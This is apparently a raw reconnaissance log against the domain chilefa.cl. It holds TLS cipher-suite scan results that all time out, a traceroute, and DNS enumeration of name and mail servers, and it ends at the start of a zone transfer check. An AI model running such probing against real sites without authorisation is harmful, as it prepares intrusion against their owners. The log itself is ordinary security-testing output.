648 TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
649 TLS_DH_RSA_WITH_SEED_CBC_SHA timeout - timed out
650 TLS_DH_RSA_WITH_DES_CBC_SHA timeout - timed out
651 TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
652 TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
653 TLS_DH_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
654 TLS_DH_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
655 TLS_DH_RSA_WITH_AES_256_CBC_SHA timeout - timed out
656 TLS_DH_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
657 TLS_DH_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
658 TLS_DH_RSA_WITH_AES_128_CBC_SHA timeout - timed out
659 TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
660 TLS_DH_DSS_WITH_SEED_CBC_SHA timeout - timed out
661 TLS_DH_DSS_WITH_DES_CBC_SHA timeout - timed out
662 TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
663 TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
664 TLS_DH_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
665 TLS_DH_DSS_WITH_AES_256_CBC_SHA256 timeout - timed out
666 TLS_DH_DSS_WITH_AES_256_CBC_SHA timeout - timed out
667 TLS_DH_DSS_WITH_AES_128_GCM_SHA256 timeout - timed out
668 TLS_DH_DSS_WITH_AES_128_CBC_SHA256 timeout - timed out
669 TLS_DH_DSS_WITH_AES_128_CBC_SHA timeout - timed out
670 TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA timeout - timed out
671 TLS_DHE_RSA_WITH_SEED_CBC_SHA timeout - timed out
672 TLS_DHE_RSA_WITH_DES_CBC_SHA timeout - timed out
673 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
674 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
675 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
676 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
677 TLS_DHE_RSA_WITH_AES_256_CBC_SHA timeout - timed out
678 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
679 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
680 TLS_DHE_RSA_WITH_AES_128_CBC_SHA timeout - timed out
681 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
682 TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
683 TLS_DHE_DSS_WITH_SEED_CBC_SHA timeout - timed out
684 TLS_DHE_DSS_WITH_DES_CBC_SHA timeout - timed out
685 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
686 TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
687 TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
688 TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 timeout - timed out
689 TLS_DHE_DSS_WITH_AES_256_CBC_SHA timeout - timed out
690 TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 timeout - timed out
691 TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 timeout - timed out
692 TLS_DHE_DSS_WITH_AES_128_CBC_SHA timeout - timed out
693 TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA timeout - timed out
694 TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
695
696 * Certificate Information:
697Unhandled exception while running --certinfo:
698timeout - timed out
699
700 * TLSV1_1 Cipher Suites:
701 Server rejected all cipher suites.
702 Undefined - An unexpected error happened:
703 TLS_RSA_WITH_SEED_CBC_SHA timeout - timed out
704 TLS_RSA_WITH_RC4_128_SHA timeout - timed out
705 TLS_RSA_WITH_RC4_128_MD5 timeout - timed out
706 TLS_RSA_WITH_NULL_SHA256 timeout - timed out
707 TLS_RSA_WITH_NULL_SHA timeout - timed out
708 TLS_RSA_WITH_NULL_MD5 timeout - timed out
709 TLS_RSA_WITH_IDEA_CBC_SHA timeout - timed out
710 TLS_RSA_WITH_DES_CBC_SHA timeout - timed out
711 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
712 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
713 TLS_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
714 TLS_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
715 TLS_RSA_WITH_AES_256_CBC_SHA timeout - timed out
716 TLS_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
717 TLS_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
718 TLS_RSA_WITH_AES_128_CBC_SHA timeout - timed out
719 TLS_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
720 TLS_RSA_EXPORT_WITH_RC4_40_MD5 timeout - timed out
721 TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 timeout - timed out
722 TLS_RSA_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
723 TLS_ECDH_anon_WITH_RC4_128_SHA timeout - timed out
724 TLS_ECDH_anon_WITH_NULL_SHA timeout - timed out
725 TLS_ECDH_anon_WITH_AES_256_CBC_SHA timeout - timed out
726 TLS_ECDH_anon_WITH_AES_128_CBC_SHA timeout - timed out
727 TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA timeout - timed out
728 TLS_ECDH_RSA_WITH_RC4_128_SHA timeout - timed out
729 TLS_ECDH_RSA_WITH_NULL_SHA timeout - timed out
730 TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
731 TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 timeout - timed out
732 TLS_ECDH_RSA_WITH_AES_256_CBC_SHA timeout - timed out
733 TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
734 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
735 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA timeout - timed out
736 TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
737 TLS_ECDH_ECDSA_WITH_RC4_128_SHA timeout - timed out
738 TLS_ECDH_ECDSA_WITH_NULL_SHA timeout - timed out
739 TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 timeout - timed out
740 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 timeout - timed out
741 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA timeout - timed out
742 TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 timeout - timed out
743 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 timeout - timed out
744 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA timeout - timed out
745 TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
746 TLS_ECDHE_RSA_WITH_RC4_128_SHA timeout - timed out
747 TLS_ECDHE_RSA_WITH_NULL_SHA timeout - timed out
748 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
749 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 timeout - timed out
750 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA timeout - timed out
751 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
752 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
753 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA timeout - timed out
754 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
755 TLS_ECDHE_ECDSA_WITH_RC4_128_SHA timeout - timed out
756 TLS_ECDHE_ECDSA_WITH_NULL_SHA timeout - timed out
757 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 timeout - timed out
758 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 timeout - timed out
759 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA timeout - timed out
760 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 timeout - timed out
761 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 timeout - timed out
762 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA timeout - timed out
763 TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
764 TLS_DH_anon_WITH_SEED_CBC_SHA timeout - timed out
765 TLS_DH_anon_WITH_RC4_128_MD5 timeout - timed out
766 TLS_DH_anon_WITH_DES_CBC_SHA timeout - timed out
767 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
768 TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
769 TLS_DH_anon_WITH_AES_256_GCM_SHA384 timeout - timed out
770 TLS_DH_anon_WITH_AES_256_CBC_SHA256 timeout - timed out
771 TLS_DH_anon_WITH_AES_256_CBC_SHA timeout - timed out
772 TLS_DH_anon_WITH_AES_128_GCM_SHA256 timeout - timed out
773 TLS_DH_anon_WITH_AES_128_CBC_SHA256 timeout - timed out
774 TLS_DH_anon_WITH_AES_128_CBC_SHA timeout - timed out
775 TLS_DH_anon_WITH_3DES_EDE_CBC_SHA timeout - timed out
776 TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 timeout - timed out
777 TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
778 TLS_DH_RSA_WITH_SEED_CBC_SHA timeout - timed out
779 TLS_DH_RSA_WITH_DES_CBC_SHA timeout - timed out
780 TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
781 TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
782 TLS_DH_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
783 TLS_DH_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
784 TLS_DH_RSA_WITH_AES_256_CBC_SHA timeout - timed out
785 TLS_DH_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
786 TLS_DH_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
787 TLS_DH_RSA_WITH_AES_128_CBC_SHA timeout - timed out
788 TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
789 TLS_DH_DSS_WITH_SEED_CBC_SHA timeout - timed out
790 TLS_DH_DSS_WITH_DES_CBC_SHA timeout - timed out
791 TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
792 TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
793 TLS_DH_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
794 TLS_DH_DSS_WITH_AES_256_CBC_SHA256 timeout - timed out
795 TLS_DH_DSS_WITH_AES_256_CBC_SHA timeout - timed out
796 TLS_DH_DSS_WITH_AES_128_GCM_SHA256 timeout - timed out
797 TLS_DH_DSS_WITH_AES_128_CBC_SHA256 timeout - timed out
798 TLS_DH_DSS_WITH_AES_128_CBC_SHA timeout - timed out
799 TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA timeout - timed out
800 TLS_DHE_RSA_WITH_SEED_CBC_SHA timeout - timed out
801 TLS_DHE_RSA_WITH_DES_CBC_SHA timeout - timed out
802 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
803 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
804 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
805 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
806 TLS_DHE_RSA_WITH_AES_256_CBC_SHA timeout - timed out
807 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
808 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
809 TLS_DHE_RSA_WITH_AES_128_CBC_SHA timeout - timed out
810 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
811 TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
812 TLS_DHE_DSS_WITH_SEED_CBC_SHA timeout - timed out
813 TLS_DHE_DSS_WITH_DES_CBC_SHA timeout - timed out
814 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
815 TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
816 TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
817 TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 timeout - timed out
818 TLS_DHE_DSS_WITH_AES_256_CBC_SHA timeout - timed out
819 TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 timeout - timed out
820 TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 timeout - timed out
821 TLS_DHE_DSS_WITH_AES_128_CBC_SHA timeout - timed out
822 TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA timeout - timed out
823 TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
824
825 * TLSV1_2 Cipher Suites:
826 Server rejected all cipher suites.
827 Undefined - An unexpected error happened:
828 TLS_RSA_WITH_SEED_CBC_SHA timeout - timed out
829 TLS_RSA_WITH_RC4_128_SHA timeout - timed out
830 TLS_RSA_WITH_RC4_128_MD5 timeout - timed out
831 TLS_RSA_WITH_NULL_SHA256 timeout - timed out
832 TLS_RSA_WITH_NULL_SHA timeout - timed out
833 TLS_RSA_WITH_NULL_MD5 timeout - timed out
834 TLS_RSA_WITH_IDEA_CBC_SHA timeout - timed out
835 TLS_RSA_WITH_DES_CBC_SHA timeout - timed out
836 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA256 timeout - timed out
837 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
838 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA256 timeout - timed out
839 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
840 TLS_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
841 TLS_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
842 TLS_RSA_WITH_AES_256_CBC_SHA timeout - timed out
843 TLS_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
844 TLS_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
845 TLS_RSA_WITH_AES_128_CBC_SHA timeout - timed out
846 TLS_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
847 TLS_RSA_EXPORT_WITH_RC4_40_MD5 timeout - timed out
848 TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5 timeout - timed out
849 TLS_RSA_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
850 TLS_ECDH_anon_WITH_RC4_128_SHA timeout - timed out
851 TLS_ECDH_anon_WITH_NULL_SHA timeout - timed out
852 TLS_ECDH_anon_WITH_AES_256_CBC_SHA timeout - timed out
853 TLS_ECDH_anon_WITH_AES_128_CBC_SHA timeout - timed out
854 TLS_ECDH_anon_WITH_3DES_EDE_CBC_SHA timeout - timed out
855 TLS_ECDH_RSA_WITH_RC4_128_SHA timeout - timed out
856 TLS_ECDH_RSA_WITH_NULL_SHA timeout - timed out
857 TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
858 TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384 timeout - timed out
859 TLS_ECDH_RSA_WITH_AES_256_CBC_SHA timeout - timed out
860 TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
861 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
862 TLS_ECDH_RSA_WITH_AES_128_CBC_SHA timeout - timed out
863 TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
864 TLS_ECDH_ECDSA_WITH_RC4_128_SHA timeout - timed out
865 TLS_ECDH_ECDSA_WITH_NULL_SHA timeout - timed out
866 TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384 timeout - timed out
867 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384 timeout - timed out
868 TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA timeout - timed out
869 TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256 timeout - timed out
870 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256 timeout - timed out
871 TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA timeout - timed out
872 TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
873 TLS_ECDHE_RSA_WITH_RC4_128_SHA timeout - timed out
874 TLS_ECDHE_RSA_WITH_NULL_SHA timeout - timed out
875 TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256 timeout - timed out
876 TLS_ECDHE_RSA_WITH_CAMELLIA_256_CBC_SHA384 timeout - timed out
877 TLS_ECDHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 timeout - timed out
878 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
879 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 timeout - timed out
880 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA timeout - timed out
881 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
882 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
883 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA timeout - timed out
884 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
885 TLS_ECDHE_ECDSA_WITH_RC4_128_SHA timeout - timed out
886 TLS_ECDHE_ECDSA_WITH_NULL_SHA timeout - timed out
887 TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256 timeout - timed out
888 TLS_ECDHE_ECDSA_WITH_CAMELLIA_256_CBC_SHA384 timeout - timed out
889 TLS_ECDHE_ECDSA_WITH_CAMELLIA_128_CBC_SHA256 timeout - timed out
890 TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384 timeout - timed out
891 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384 timeout - timed out
892 TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA timeout - timed out
893 TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256 timeout - timed out
894 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256 timeout - timed out
895 TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA timeout - timed out
896 TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
897 TLS_DH_anon_WITH_SEED_CBC_SHA timeout - timed out
898 TLS_DH_anon_WITH_RC4_128_MD5 timeout - timed out
899 TLS_DH_anon_WITH_DES_CBC_SHA timeout - timed out
900 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA256 timeout - timed out
901 TLS_DH_anon_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
902 TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA256 timeout - timed out
903 TLS_DH_anon_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
904 TLS_DH_anon_WITH_AES_256_GCM_SHA384 timeout - timed out
905 TLS_DH_anon_WITH_AES_256_CBC_SHA256 timeout - timed out
906 TLS_DH_anon_WITH_AES_256_CBC_SHA timeout - timed out
907 TLS_DH_anon_WITH_AES_128_GCM_SHA256 timeout - timed out
908 TLS_DH_anon_WITH_AES_128_CBC_SHA256 timeout - timed out
909 TLS_DH_anon_WITH_AES_128_CBC_SHA timeout - timed out
910 TLS_DH_anon_WITH_3DES_EDE_CBC_SHA timeout - timed out
911 TLS_DH_anon_EXPORT_WITH_RC4_40_MD5 timeout - timed out
912 TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
913 TLS_DH_RSA_WITH_SEED_CBC_SHA timeout - timed out
914 TLS_DH_RSA_WITH_DES_CBC_SHA timeout - timed out
915 TLS_DH_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
916 TLS_DH_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
917 TLS_DH_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
918 TLS_DH_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
919 TLS_DH_RSA_WITH_AES_256_CBC_SHA timeout - timed out
920 TLS_DH_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
921 TLS_DH_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
922 TLS_DH_RSA_WITH_AES_128_CBC_SHA timeout - timed out
923 TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
924 TLS_DH_DSS_WITH_SEED_CBC_SHA timeout - timed out
925 TLS_DH_DSS_WITH_DES_CBC_SHA timeout - timed out
926 TLS_DH_DSS_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
927 TLS_DH_DSS_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
928 TLS_DH_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
929 TLS_DH_DSS_WITH_AES_256_CBC_SHA256 timeout - timed out
930 TLS_DH_DSS_WITH_AES_256_CBC_SHA timeout - timed out
931 TLS_DH_DSS_WITH_AES_128_GCM_SHA256 timeout - timed out
932 TLS_DH_DSS_WITH_AES_128_CBC_SHA256 timeout - timed out
933 TLS_DH_DSS_WITH_AES_128_CBC_SHA timeout - timed out
934 TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA timeout - timed out
935 TLS_DHE_RSA_WITH_SEED_CBC_SHA timeout - timed out
936 TLS_DHE_RSA_WITH_DES_CBC_SHA timeout - timed out
937 TLS_DHE_RSA_WITH_CHACHA20_POLY1305_SHA256 timeout - timed out
938 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA256 timeout - timed out
939 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
940 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA256 timeout - timed out
941 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
942 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 timeout - timed out
943 TLS_DHE_RSA_WITH_AES_256_CCM timeout - timed out
944 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 timeout - timed out
945 TLS_DHE_RSA_WITH_AES_256_CBC_SHA timeout - timed out
946 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 timeout - timed out
947 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 timeout - timed out
948 TLS_DHE_RSA_WITH_AES_128_CBC_SHA timeout - timed out
949 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
950 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA timeout - timed out
951 TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
952 TLS_DHE_DSS_WITH_SEED_CBC_SHA timeout - timed out
953 TLS_DHE_DSS_WITH_DES_CBC_SHA timeout - timed out
954 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA256 timeout - timed out
955 TLS_DHE_DSS_WITH_CAMELLIA_256_CBC_SHA timeout - timed out
956 TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA256 timeout - timed out
957 TLS_DHE_DSS_WITH_CAMELLIA_128_CBC_SHA timeout - timed out
958 TLS_DHE_DSS_WITH_AES_256_GCM_SHA384 timeout - timed out
959 TLS_DHE_DSS_WITH_AES_256_CBC_SHA256 timeout - timed out
960 TLS_DHE_DSS_WITH_AES_256_CBC_SHA timeout - timed out
961 TLS_DHE_DSS_WITH_AES_128_GCM_SHA256 timeout - timed out
962 TLS_DHE_DSS_WITH_AES_128_CBC_SHA256 timeout - timed out
963 TLS_DHE_DSS_WITH_AES_128_CBC_SHA timeout - timed out
964 TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA timeout - timed out
965 TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA timeout - timed out
966 TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA timeout - timed out
967 RSA_WITH_AES_256_CCM_8 timeout - timed out
968 RSA_WITH_AES_256_CCM timeout - timed out
969 RSA_WITH_AES_128_CCM_8 timeout - timed out
970 RSA_WITH_AES_128_CCM timeout - timed out
971 ECDHE_ECDSA_WITH_AES_256_CCM_8 timeout - timed out
972 ECDHE_ECDSA_WITH_AES_256_CCM timeout - timed out
973 ECDHE_ECDSA_WITH_AES_128_CCM_8 timeout - timed out
974 ECDHE_ECDSA_WITH_AES_128_CCM timeout - timed out
975 ECDHE-ECDSA-ARIA256-GCM-SHA384 timeout - timed out
976 ECDHE-ECDSA-ARIA128-GCM-SHA256 timeout - timed out
977 ECDHE-ARIA256-GCM-SHA384 timeout - timed out
978 ECDHE-ARIA128-GCM-SHA256 timeout - timed out
979 DHE_RSA_WITH_AES_256_CCM_8 timeout - timed out
980 DHE_RSA_WITH_AES_128_CCM_8 timeout - timed out
981 DHE_RSA_WITH_AES_128_CCM timeout - timed out
982 DHE-RSA-ARIA256-GCM-SHA384 timeout - timed out
983 DHE-RSA-ARIA128-GCM-SHA256 timeout - timed out
984 DHE-DSS-ARIA256-GCM-SHA384 timeout - timed out
985 DHE-DSS-ARIA128-GCM-SHA256 timeout - timed out
986 ARIA256-GCM-SHA384 timeout - timed out
987 ARIA128-GCM-SHA256 timeout - timed out
988
989
990 SCAN COMPLETED IN 316.36 S
991######################################################################################################################################
992traceroute to www.chilefa.cl (143.95.110.248), 30 hops max, 60 byte packets
993 1 _gateway (10.202.8.1) 126.323 ms 140.409 ms 140.396 ms
994 2 185.32.222.3 (185.32.222.3) 140.496 ms 140.468 ms *
995 3 core02-40gb.datasource.ch (91.201.58.73) 140.235 ms 140.233 ms 140.210 ms
996 4 zch-b2-link.telia.net (62.115.180.122) 140.188 ms 140.164 ms 140.147 ms
997 5 ffm-bb2-link.telia.net (62.115.142.104) 140.166 ms 140.113 ms ffm-bb1-link.telia.net (62.115.142.110) 247.582 ms
998 6 ffm-b5-link.telia.net (62.115.114.89) 247.507 ms 168.550 ms 163.642 ms
999 7 be3031.agr41.fra03.atlas.cogentco.com (130.117.14.197) 272.448 ms 272.421 ms 272.400 ms
1000 8 be3186.ccr41.fra03.atlas.cogentco.com (130.117.0.1) 272.314 ms 272.302 ms be3187.ccr42.fra03.atlas.cogentco.com (130.117.1.118) 272.287 ms
1001 9 be2814.ccr42.ams03.atlas.cogentco.com (130.117.0.141) 272.273 ms be2813.ccr41.ams03.atlas.cogentco.com (130.117.0.121) 272.233 ms be2814.ccr42.ams03.atlas.cogentco.com (130.117.0.141) 272.215 ms
100210 be2183.ccr22.lpl01.atlas.cogentco.com (154.54.58.69) 323.654 ms 323.581 ms 272.120 ms
100311 be3042.ccr21.ymq01.atlas.cogentco.com (154.54.44.162) 323.567 ms be3043.ccr22.ymq01.atlas.cogentco.com (154.54.44.166) 323.549 ms 323.481 ms
100412 be3260.ccr32.yyz02.atlas.cogentco.com (154.54.42.89) 408.396 ms be3628.ccr42.jfk02.atlas.cogentco.com (154.54.27.169) 263.698 ms be3259.ccr31.yyz02.atlas.cogentco.com (154.54.41.205) 263.563 ms
100513 be2994.ccr22.cle04.atlas.cogentco.com (154.54.31.233) 263.548 ms 263.524 ms be2993.ccr21.cle04.atlas.cogentco.com (154.54.31.225) 263.509 ms
100614 be2718.ccr42.ord01.atlas.cogentco.com (154.54.7.129) 263.460 ms 263.435 ms 263.419 ms
100715 be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165) 301.332 ms be2832.ccr22.mci01.atlas.cogentco.com (154.54.44.169) 301.337 ms be2831.ccr21.mci01.atlas.cogentco.com (154.54.42.165) 430.205 ms
100816 be2433.ccr32.dfw01.atlas.cogentco.com (154.54.3.213) 430.067 ms 430.061 ms be2432.ccr31.dfw01.atlas.cogentco.com (154.54.3.133) 305.418 ms
100917 be2561.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.6.74) 429.995 ms 429.986 ms be2560.rcr21.b010621-0.dfw01.atlas.cogentco.com (154.54.5.238) 366.315 ms
101018 38.32.13.210 (38.32.13.210) 366.249 ms 366.245 ms 366.223 ms
101119 ip-143-95-110-248.iplocal (143.95.110.248) 366.178 ms 366.119 ms 366.060 ms
1012#######################################################################################################################################
1013Domains still to check: 1
1014 Checking if the hostname chilefa.cl. given is in fact a domain...
1015
1016Analyzing domain: chilefa.cl.
1017 Checking NameServers using system default resolver...
1018 IP: 162.210.50.254 (United States)
1019 HostName: dns.site5.com Type: NS
1020 HostName: dns.site5.com Type: PTR
1021 IP: 108.174.149.181 (United States)
1022 HostName: dns2.site5.com Type: NS
1023 HostName: dns2.site5.com Type: PTR
1024
1025 Checking MailServers using system default resolver...
1026 IP: 172.253.118.27 (United States)
1027 HostName: alt1.aspmx.l.google.com Type: MX
1028 IP: 64.233.189.27 (United States)
1029 HostName: alt2.aspmx.l.google.com Type: MX
1030 HostName: tl-in-f27.1e100.net Type: PTR
1031 IP: 108.177.8.26 (United States)
1032 HostName: alt4.aspmx.l.google.com Type: MX
1033 HostName: ow-in-f26.1e100.net Type: PTR
1034 IP: 74.125.28.26 (United States)
1035 HostName: alt3.aspmx.l.google.com Type: MX
1036 HostName: pc-in-f26.1e100.net Type: PTR
1037 IP: 173.194.79.26 (United States)
1038 HostName: aspmx.l.google.com Type: MX
1039 HostName: eg-in-f26.1e100.net Type: PTR
1040 WARNING!! This domain has wildcards activated for hostnames resolution. We are checking "www" anyway, but perhaps it doesn't exists!
1041
1042 Checking the zone transfer for each NS... (if this takes more than 10 seconds, just hit CTRL-C and it will continue. Bug in the libs)
